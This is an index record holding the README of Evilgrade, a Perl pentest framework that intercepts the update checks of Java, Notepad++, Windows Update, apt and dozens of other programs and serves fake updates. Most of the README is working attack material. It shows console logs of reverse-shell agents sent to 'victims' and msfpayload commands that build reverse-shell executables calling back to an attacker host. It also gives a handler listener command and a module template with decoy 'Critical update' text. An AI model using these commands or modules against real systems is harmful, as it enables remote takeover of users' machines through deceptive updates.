{"id":13433254,"url":"https://github.com/infobyte/evilgrade","last_synced_at":"2025-05-16T06:06:58.296Z","repository":{"id":8178465,"uuid":"9603081","full_name":"infobyte/evilgrade","owner":"infobyte","description":"Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates.","archived":false,"fork":false,"pushed_at":"2021-09-01T17:08:27.000Z","size":8071,"stargazers_count":1307,"open_issues_count":11,"forks_count":283,"subscribers_count":102,"default_branch":"master","last_synced_at":"2025-04-08T16:04:37.697Z","etag":null,"topics":["evilgrade","fake","mitm","payload","penetration","pentest","security","update"],"latest_commit_sha":null,"homepage":"https://www.faradaysec.com/","language":"Perl","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/infobyte.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2013-04-22T16:08:48.000Z","updated_at":"2025-04-02T03:17:12.000Z","dependencies_parsed_at":"2022-09-02T18:50:28.149Z","dependency_job_id":null,"html_url":"https://github.com/infobyte/evilgrade","commit_stats":null,"previous_names":[],"tags_count":4,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/infobyte%2Fevilgrade","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/infobyte%2Fevilgrade/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/infobyte%2Fevilgrade/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/infobyte%2Fevilgrade/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/infobyte","download_url":"https://codeload.github.com/infobyte/evilgrade/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254478190,"owners_count":22077676,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["evilgrade","fake","mitm","payload","penetration","pentest","security","update"],"created_at":"2024-07-31T02:01:23.160Z","updated_at":"2025-05-16T06:06:53.287Z","avatar_url":"https://github.com/infobyte.png","language":"Perl","funding_links":[],"categories":["Perl","Tools","Network Tools","Network","Tools:","Awesome Penetration Testing (\"https://github.com/Muhammd/Awesome-Pentest\")"],"sub_categories":["Network Tools","Proxies and Machine-in-the-Middle (MITM) Tools","Tools"],"readme":"\u003cp align=\"center\" \u003e\n \u003ca href=\"https://www.faradaysec.com\" target=\"_blank\"\u003e\u003cimg src=\"https://1.bp.blogspot.com/-DHDtcxnAujs/Xp5TEcdoeeI/AAAAAAAASZQ/fbSKCoPnFjUwhbPN0bUQyIpSWnPKRMhZACNcBGAsYHQ/s1600/ad_kitploitadv6.png\"\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp align=\"center\" \u003e\n Faraday Security Research\n-- | ISR-evilgrade | www.faradaysec.com | --\n\u003c/p\u003e\n\n## .:: [BRIEF OVERVIEW] ::.\n\nEvilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates.\nIt comes with pre-made binaries (agents), a working default configuration for fast pentests, and has it's own WebServer and DNSServer modules.\nEasy to set up new settings, and has an autoconfiguration when new binary agents are set.\n\n##### * When should I use evilgrade?\n\nThis framework comes into play when the attacker is able to make hostname redirections (manipulation of victim's dns traffic), and such thing can be done on 2 scenarios:\n\n##### Internal scenery:\n- Internal DNS access\n- ARP spoofing\n- DNS Cache Poisoning\n- DHCP spoofing\n- TCP hijacking\n- Wi-Fi Access Point impersonation\n\n##### External scenery:\n- Internal DNS access\n- DNS Cache Poisoning\n\n##### * How does it work?\n\nEvilgrade works with modules, in each module there's an implemented structure which is needed to emulate a fake update for an specific application/system.\n\n##### * What OS are supported?\n\nISR-Evilgrade is crossplatform, it only depends of having an appropriate payload for the right target platform to be exploited.\n\n#### Implemented modules:\n-------------------\n- Freerip 3.30\n- Jet photo 4.7.2\n- Teamviewer 5.1.9385\n- ISOpen 4.5.0\n- Istat.\n- Gom 2.1.25.5015\n- Atube catcher 1.0.300\n- Vidbox 7.5\n- Ccleaner 2.30.1130\n- Fcleaner 1.2.9.409\n- Allmynotes 1.26\n- Notepad++ 5.8.2\n- Java 1.6.0_22 winxp/win7\n- aMSN 0.98.3\n- Appleupdate \u003c= 2.1.1.116 ( Safari 5.0.2 7533.18.5, \u003c= Itunes 10.0.1.22, \u003c= Quicktime 7.6.8 1675)\n- Mirc 7.14\n- Windows update (ie6 lastversion, ie7 7.0.5730.13, ie8 8.0.60001.18702, Microsoft works)\n- Dap 9.5.0.3\n- Winscp 4.2.9\n- AutoIt Script 3.3.6.1\n- Clamwin 0.96.0.1\n- AppTapp Installer 3.11 (Iphone/Itunes)\n- getjar (facebook.com)\n- Google Analytics Javascript injection\n- Speedbit Optimizer 3.0 / Video Acceleration 2.2.1.8\n- Winamp 5.581\n- TechTracker (cnet) 1.3.1 (Build 55)\n- Nokiasoftware firmware update 2.4.8es - (Windows software)\n- Nokia firmware v20.2.011\n- BSplayer 2.53.1034\n- Apt ( \u003c Ubuntu 10.04 LTS)\n- Ubertwitter 4.6 (0.971)\n- Blackberry Facebook 1.7.0.22 | Twitter 1.0.0.45\n- Cpan 1.9402\n- VirtualBox (3.2.8 )\n- Express talk\n- Filezilla\n- Flashget\n- Miranda\n- Orbit\n- Photoscape.\n- Panda Antirootkit\n- Skype\n- Sunbelt\n- Superantispyware\n- Trillian \u003c= 5.0.0.26\n- Adium 1.3.10 (Sparkle Framework)\n- VMware\n- more...\n\n\n* /docs/CHANGES\n\n## .:: [MAIN USAGE] ::.\n\nIt works similar to an IOS console\n```\nevilgrade\u003ehelp\nType 'help command' for more detailed help on a command.\n Commands:\n configure - Configure \u003cmodule-name\u003e - no help available\n exit - exits the program\n help - prints this screen, or help on 'command'\n reload - Reload to update all the modules - no help available\n restart - Restart webserver - no help available\n set - Configure variables - no help available\n show - Display information of \u003cobject\u003e.\n start - Start webserver - no help available\n status - Get webserver status - no help available\n stop - Stop webserver - no help available\n version - Display framework version. - no help available\n\n Object:\n options - Show options of current module.\n vhosts - Show VirtualHosts of current module.\n modules - List all modules available for use.\n active - Show active modules.\n```\n\n## List implemented modules\n``` console\nevilgrade\u003eshow modules\n\nList of modules:\n===============\n\n...\n...\n...\n\n- 63 modules available.\n```\n#### Configure a specified module\n``` console\nevilgrade\u003econf sunjava\nevilgrade(sunjava)\u003e\n\n```\n\n#### Show all VirtualHosts.\n#### VirtualHost field contains the domains that our webserver is going to emulate for us.\n``` console\nevilgrade\u003eshow vhosts\n\nVirtual hosts:\n=============\n\n[\n \"java.sun.com\",\n \"javadl-esd.sun.com\",\n ...\n ...\n ...\n]\n```\n\n#### Show options of current module.\n#### agent: This is our fake update binary, we have to set the path to where it's located or implement a dynamic fake update binary generation (see ADVANCED).\n``` console\nevilgrade(sunjava)\u003eshow options\n\nDisplay options:\n===============\n\nName = Sun Microsystems Java\nVersion = 2.0\nAuthor = [\"Francisco Amato \u003c famato +[AT]+ faradaysec.com\u003e\"]\nDescription = \"\"\nVirtualHost = \"java.sun.com|javadl-esd.sun.com\"\n\n.-------------------------------------------------------------------------------------------------------------------------.\n| Name | Default | Description |\n+--------------+-------------------------------------------------+--------------------------------------------------------+\n| website | http://java.com/moreinfolink | Website displayed in the update |\n| enable | 1 | Status |\n| atitle | Critical vulnerability | Title name to be displayed in the systray item popup |\n| arg | | Arg passed to Agent |\n| adescription | This critical update fix internal vulnerability | Description to be displayed in the systray item popup |\n| description | This critical update fix internal vulnerability | Description to be displayed during the update |\n| agent | ./agent/reverseshellsign.exe | Agent to inject |\n| title | Critical update | Title name displayed in the update |\n'--------------+-------------------------------------------------+--------------------------------------------------------'\n```\n#### Start services (DNS Server and WebServer)\n``` console\nevilgrade\u003estart\nevilgrade\u003e\n[28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ...\nevilgrade\u003e\n[28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...\n\n#### Waiting for victims\n\nevilgrade\u003e\n[25/7/2008:4:58:25] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: \"^/update/[.\\\\d]+/map\\\\-[.\\\\d]+.xml\"\nevilgrade\u003e\n[25/7/2008:4:58:26] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: \"^/java_update.xml\\$\"\nevilgrade\u003e\n[25/7/2008:4:58:39] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: \".exe\"\nevilgrade\u003e\n[25/7/2008:4:58:40] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Agent sent: \"./agent/reverseshell.exe\"\n```\n#### Show status and victims logs\n``` console\nevilgrade\u003eshow status\nWebserver (pid 4134) already running\n\nUsers status:\n============\n\n.---------------------------------------------------------------------------------------------------------------.\n| Client | Module | Status | Md5,Cmd,File |\n+----------------+------------------+--------+------------------------------------------------------------------+\n| 192.168.233.10 | modules::sunjava | send | d9a28baa883ecf51e41fc626e1d4eed5,'',\"./agent/reverseshell.exe\" |\n'----------------+------------------+--------+------------------------------------------------------------------'\n```\n\n## .:: [DEEP USAGE] ::.\n\n### Commands\n#### configure / conf - Configure \u003cmodule-name\u003e\n\nExample:\n-------\n``` console\nevilgrade\u003econfigure sunjava\nevilgrade(sunjava)\u003e\n\nevilgrade\u003econf sunjava\nevilgrade(sunjava)\u003e\n\n## 'conf' takes us back to the global configuration\nevilgrade(sunjava)\u003econf\nevilgrade\u003e\n\n\n##\nreload - Reload to get all modules update (to refresh loaded modules, useful on development)\nstart - Start webserver\nstop - Stop webserver (fake update server)\n```\n\n\nExample:\n-------\n``` console\nevilgrade\u003estart\nevilgrade\u003e\n[28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ...\nevilgrade\u003e\n[28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...\n\n\n#######################################\n\n\n\nExample:\n-------\nevilgrade\u003estop\nStopping WEBSERVER [OK]\nStopping DNSSERVER [OK]\n\n#######################################\n\nrestart - Restart services (WebServer and DNS Server)\nstops and starts again\n\n#######################################\n\nstatus - Get webserver and victims status\n\nExample:\n-------\nevilgrade\u003eshow status\nWebserver (pid 4134) already running\n\nUsers status:\n============\n\n.---------------------------------------------------------------------------------------------------------------.\n| Client | Module | Status | Md5,Cmd,File |\n+----------------+------------------+--------+------------------------------------------------------------------+\n| 192.168.233.10 | modules::sunjava | send | d9a28baa883ecf51e41fc626e1d4eed5,'',\"./agent/reverseshell.exe\" |\n'----------------+------------------+--------+------------------------------------------------------------------'\n\n#######################################\n\nshow - Display information of \u003cobject\u003e.\n\n#######################################\n\nshow active - Display active modules in the webserver\n\n#######################################\n\nshow modules - Display implemented modules\n\n#########################################\n\nshow options - Display modules/global options\n\nExample:\n-------\n\nevilgrade\u003eshow options\n\nDisplay options:\n===============\n\n.-----------------------------------------------------------------------------------.\n| Name | Default | Description |\n+-------------+-----------+---------------------------------------------------------+\n| DNSEnable | 1 | Enable DNS Server ( handle virtual request on modules ) |\n| DNSAnswerIp | 127.0.0.1 | Resolve VHost to ip ) |\n| DNSPort | 53 | Listen Name Server port |\n| debug | 1 | Debug mode |\n| port | 80 | Webserver listening port |\n| sslport | 443 | Webserver SSL listening port |\n'-------------+-----------+---------------------------------------------------------'\n\nevilgrade\u003e\nevilgrade(notepadplus)\u003econf vmware\nevilgrade(vmware)\u003eshow options (without started services)\n\nDisplay options:\n===============\n\nName = VMware Server\nVersion = 1.0\nAuthor = [\"Francisco Amato \u003c famato +[AT]+ faradaysec.com\u003e\"]\nDescription = \"\"\nVirtualHost = \"www.vmware.com\"\n\n.----------------------------------------------.\n| Name | Default | Description |\n+--------+-------------------+-----------------+\n| enable | 1 | Status |\n| agent | ./agent/agent.exe | Agent to inject |\n'--------+-------------------+-----------------'\n\nevilgrade(vmware)\u003eshow options (with started services after setting agent)\n\nDisplay options:\n===============\n\nName = VMware Server\nVersion = 1.0\nAuthor = [\"Francisco Amato \u003c famato +[AT]+ faradaysec.com\u003e\"]\nDescription = \"\"\nVirtualHost = \"www.vmware.com\"\n\n.--------------------------------------------------------------------------------------------------.\n| Name | Default | Description |\n+-------------+------------------------------------------------------------------+-----------------+\n| enable | 1 | Status |\n| agentmd5 | f80af637642170507bda998b6f2015fa | |\n| agentsize | 54576 | |\n| agent | ./agent/agent.exe | Agent to inject |\n| agentsha256 | 44f4e3f65f6ca375df4e0247fa0ee1efedbe2965a1c35e910d8d035ec61b76bd | |\n'-------------+------------------------------------------------------------------+-----------------'\n\n\n#########################################\n\nset - Configure variables global or modules\n\nExample:\n-------\n\nevilgrade\u003eshow options\n\n\nDisplay options:\n===============\n\n.-----------------------------------------------------------------------------------.\n| Name | Default | Description |\n+-------------+-----------+---------------------------------------------------------+\n| DNSEnable | 1 | Enable DNS Server ( handle virtual request on modules ) |\n| DNSAnswerIp | 127.0.0.1 | Resolve VHost to ip ) |\n| DNSPort | 53 | Listen Name Server port |\n| debug | 0 | Debug mode |\n| port | 80 | Webserver listening port |\n| sslport | 443 | Webserver SSL listening port |\n'-------------+-----------+---------------------------------------------------------'\n\n###Let's enable DEBUG option and set as DNSAnswerIp our Inet address (192.168.1.4)\n\nevilgrade\u003eset debug 1 #Enable debug\nset debug, 1\n\nevilgrade\u003eset DNSAnswerIp 192.168.1.4 #Ip where evilgrade's DNS Server is listening\nset DNSAnswerIp, 192.168.1.4\n\nevilgrade\u003eshow options\n\nDisplay options:\n===============\n\n.-------------------------------------------------------------------------------------.\n| Name | Default | Description |\n+-------------+-------------+---------------------------------------------------------+\n| DNSEnable | 1 | Enable DNS Server ( handle virtual request on modules ) |\n| DNSAnswerIp | 192.168.1.4 | Resolve VHost to ip ) |\n| DNSPort | 53 | Listen Name Server port |\n| debug | 1 | Debug mode |\n| port | 80 | Webserver listening port |\n| sslport | 443 | Webserver SSL listening port |\n'-------------+-------------+---------------------------------------------------------'\n\n\n###############################\n\nexit - exits the program\n\n#######################################\n\nhelp - prints this screen, or help on 'command'\n\n#######################################\n\n```\n\n## .:: [ADVANCED] ::.\n\n- Modules Options:\nEach module has special options, but the \"agent\" field is always present.\nThe agent is our fake update binary, we have to set the path to where it's located or implement a dynamic fake update binary generation.\n\n[Dynamic fake update binary] allows the execution of an external command to generate our binary, for example using msfpayload of metasploit framework.\nWith this feature we can generate any payload of metasploit or use an external interface to create the binary.\n\n# Example 1:\n```\nevilgrade(sunjava)\u003eset agent '[\"/metasploit/msfpayload windows/shell_reverse_tcp LHOST=192.168.233.2 LPORT=4141 X \u003e \u003c%OUT%\u003e/tmp/a.exe\u003c%OUT%\u003e\"]'\n```\n\nIn this case for every required update binary we generate a fake update binary with the payload \"windows/shell_reverse_tcp\"\nusing a reverse shell to connect at address 192.168.233.2 port 4141.\nThe label \u003c%OUT%\u003e\u003c%OUT\u003e is a special tag to detect where the output binary is going to be generated.\nEvilgrade detects the usage of \"dynamic fake update binary feature\" due to having a sentence between squared brackets '[]'\nInside that brackets we have a string that is also between brackets \"\" that is compiled using perl.\n\nFor example if we use:\n```\nevilgrade(sunjava)\u003eset agent '[\"./generatebin -o \u003c%OUT%\u003e/tmp/update\".int(rand(256)).\".exe\u003c%OUT%\u003e\"]'\n```\nthen every time we get a binary request, evilgrade will compile the line and execute the final string \"./generatebin -o /tmp/update(random).exe\"\ngenerating different agents.\n\n\nAn easy alternative, but not dynamically, could be to generate the payload directly from msfpayload on a terminal and assign it manually to the configuration of the module.\n\n# Example 2:\n\n(Outside evilgrade)\n```\n[team@faraday]$ msfpayload windows/meterpreter/reverse_ord_tcp LHOST=192.168.100.2 LPORT=4444 X \u003e /tmp/reverse-shell.exe\n```\n\n(Inside evilgrade)\n```\nevilgrade(sunjava)\u003eset agent /tmp/reverse-shell.exe\n```\n\nAfter our payload was generated, we leave a multi handler listening on the previously assigned LHOST.\n\n(Outside evilgrade)\n```\n[team@faraday]$ msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.100.2 LPORT=4444 E\n[*] Started reverse handler on 192.168.100.2:4444\n[*] Starting the payload handler...\n```\n\n## .:: [MODULE DEVELOPMENT] ::.\n\nModule development is very simple. Since evilgrade is based on modules, you just have to use a package .pm (perl module).\nIn this case we are going to describe the sunjava update module (comments with #):\n\n``` perl\npackage modules::sunjava;\n\nuse strict;\nuse Data::Dump qw(dump);\n\nmy $base=\n{\n 'name' =\u003e 'Sun Microsystems Java', #name of the module to display in the framework\n 'version' =\u003e '2.0', #internal module version\n 'appver' =\u003e '\u003c= 1.6.0_22', #last application version tested with this evilgrade module\n 'author' =\u003e [ 'Francisco Amato \u003c famato +[AT]+ faradaysec.com\u003e' ], #author\n 'description' =\u003e qq{}, #brief description\n 'vh' =\u003e '(java.sun.com|javadl-esd.sun.com)', #VirtualHosts that the application uses to retrieve information about the update configuration files and update binaries.\n\n #Then we have the request object's collection\n 'request' =\u003e [\n #Each object it's a possible HTTP request inside the virtualhost configured for the module (java.sun.com)\n {\n 'req' =\u003e '(/update/[.\\d]+/map\\-[.\\d]+.xml|/update/1.6.0/map\\-m\\-1.6.0.xml)', #The required URL, regex friendly\n 'type' =\u003e 'file', #it's the response type (file|string|agent|install)\n #we can use:\n #file: response with content file referenced in the \"file\" option below (./include/sunjava_map.xml)\n #string: response with a string referenced in the \"string\" options below\n #agent: response with content file referenced in the \"agent\" options (options section)\n #install: response with content file referenced in the \"file\" option below\n #It's used to know if the fake update was executed\n #In some update process we can specify a final page after update installed\n #so we send to a controller page.\n 'method' =\u003e '', #not implemented yet\n 'bin' =\u003e '', #set to 1 if we are going to send a binary file\n 'string' =\u003e '', #if we have chosen the 'type' string then in this variable we set the response\n 'parse' =\u003e '', #set to 1 if the file or string need be parsed with options\n 'file' =\u003e './include/sunjava/sunjava_map.xml'\n },\n\n {\n 'req' =\u003e '^/java_update.xml$', #regex friendly\n 'type' =\u003e 'file', #file|string|agent|install\n 'method' =\u003e '', #any\n 'bin' =\u003e '',\n 'string' =\u003e '',\n 'parse' =\u003e '1',\n 'file' =\u003e './include/sunjava/sunjava_update.xml'\n },\n {\n 'req' =\u003e '/x.jnlp', #regex friendly\n 'type' =\u003e 'file', #file|string|agent|install\n 'method' =\u003e '', #any\n 'bin' =\u003e '',\n 'string' =\u003e '',\n #In this case we parse the file\n 'parse' =\u003e '1',\n #To parse the file we use special tags, like \u003c%OPTIONAME%\u003e inside the \"file\" or \"string\" field\n #This tags are replaced with the values of the options, for example\n #\u003c%TITLE%\u003e will be replaced by 'Critical update'\n 'file' =\u003e './include/sunjava/x.jnlp'\n },\n {\n 'req' =\u003e '.jar', #regex friendly\n 'type' =\u003e 'file', #file|string|agent|install\n 'method' =\u003e '', #any\n 'bin' =\u003e 1,\n 'string' =\u003e '',\n 'parse' =\u003e '',\n 'file' =\u003e './include/sunjava/JavaPayload/FunnyClass2.jar'\n },\n\n {\n 'req' =\u003e '.exe', #regex friendly\n 'type' =\u003e 'agent', #Here we have an agent type with a binary response\n 'bin' =\u003e 1,\n 'method' =\u003e '', #any\n 'string' =\u003e '',\n 'parse' =\u003e '',\n 'file' =\u003e ''\n }\n ],\n\n #Options\n #Here we have the options that will be displayed with \"show options\" inside the current module.\n #This options are used to parse the string or a file using in the responses\n 'options' =\u003e { 'agent' =\u003e { 'val' =\u003e './agent/java/javaws.exe', #The default value\n 'desc' =\u003e 'Agent to inject'}, #Brief description\n 'arg' =\u003e { 'val' =\u003e 'http://java.sun.com/x.jnlp\"',\n 'desc' =\u003e 'Arg passed to Agent'},\n 'enable' =\u003e { 'val' =\u003e 1,\n 'desc' =\u003e 'Status'},\n\n #The following is a dynamic hidden option,\n #In this case we use the tag \u003c%NAME%\u003e to parse the files and execute perl functions to get randoms values\n #You can use whatever you like in perl, if you're wishing to use more functions check \"isrcore/utils.pm\"\n 'name' =\u003e { 'val' =\u003e \"'javaupdate'.isrcore::utils::RndAlpha(isrcore::utils::RndNum(1))\",\n 'hidden' =\u003e 1,\n 'dynamic' =\u003e1,},\n\n #All the options depend on the update process. You have to research the possible variables and implement them on your module\n #These are the mostly common update messages, webpages, descriptions, popup messages, title, etc\n 'title' =\u003e { 'val' =\u003e 'Critical update',\n 'desc' =\u003e 'Title name displayed in the update'},\n 'description' =\u003e { 'val' =\u003e 'This critical update fix internal vulnerability',\n 'desc' =\u003e 'Description to be displayed during the update'},\n 'atitle' =\u003e { 'val' =\u003e 'Critical vulnerability',\n 'desc' =\u003e 'Title name to be displayed in the systray item popup'},\n 'adescription' =\u003e { 'val' =\u003e 'This critical update fix internal vulnerability',\n 'desc' =\u003e 'Description to be displayed in the systray item popup'},\n 'website' =\u003e { 'val' =\u003e 'http://java.com/moreinfolink',\n 'desc' =\u003e 'Website displayed in the update'}\n }\n};\n```\n\n## .:: [TIPS] ::.\n\n1) Don't forget to run evilgrade with an user that has privileges to create listening sockets,\notherwise you won't be able to use evilgrade's Services.\n\n2) Everytime you modify a module with evilgrade running don't forget to 'reload' them.\n\n3) Set the binary 'agents' before starting services because there are some fields that evilgrade\nwill fill out for you (agentmd5, agentsha256, and agentsize) that can't be done with them already running.\n\n4) If you're using a dynamic response with variables such as: \u003c%AGENTSIZE%\u003e, \u003c%AGENTMD5%\u003e, \u003c%URL\\_FILE%\u003e, \u003c%URL\\_FILE\\_EXT%\u003e, or custom ones defined at the options section, don't forget to set *parse* on 1.\n\n5) Same goes for injecting an agent, you must enable de *bin* flag on 1.\n\n6) If you want to make plaintext responses using HTTP use the *cheader* flag. Example below:\n```\n { 'req' =\u003e '/sitepath/download/file.zip'\n , #regex friendly\n 'type' =\u003e 'string', #file|string|agent|install\n 'method' =\u003e '', #any\n 'bin' =\u003e '',\n 'string' =\u003e '',\n 'parse' =\u003e '1',\n 'file' =\u003e '',\n 'cheader' =\u003e \"HTTP/1.1 302 Found\\r\\n\"\n . \"Location: http://sitedomain.com/\u003c%URL_FILE%\u003e.exe \\r\\n\"\n . \"Content-Length: 0 \\r\\n\"\n . \"Connection: close \\r\\n\\r\\n\",\n },\n\n7) To filter via User-Agent, use as an example the Sparkle2 module. In base add 'useragent' =\u003e 'true', and on a request use as you would use the 'req' field but for user agents in 'useragent'. Note that this field already stripped \"User-Agent: \".\n```\n\n## .:: [REQUIREMENTS] ::.\n\n### Perl Modules\n```\n Data::Dump\n Digest::MD5\n Time::HiRes\n RPC::XML\n```\n\n## .:: [MORE INFORMATION] ::.\n\nThis framework was presented in the following security conferences:\n\n```\n· ekoparty 2007 [Buenos Aires, Argentina] [www.ekoparty.org]\n· Troopers 2008 [Munich, Germany] [www.troopers08.org]\n· Shakacon 2008 [Hawaii, USA] [www.shakacon.org]\n· H2HC 2009 [Brazil] [www.h2hc.com.br]\n· Blackhat Arsenal \u0026 Defcon 2010 [Las Vegas, USA] [www.blackhat.com www.defcon.org]\n```\n\n\n## .:: [AUTHOR] ::.\n\nFrancisco Amato\nfamato+at+faradaysec+dot+com\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Finfobyte%2Fevilgrade","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Finfobyte%2Fevilgrade","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Finfobyte%2Fevilgrade/lists"}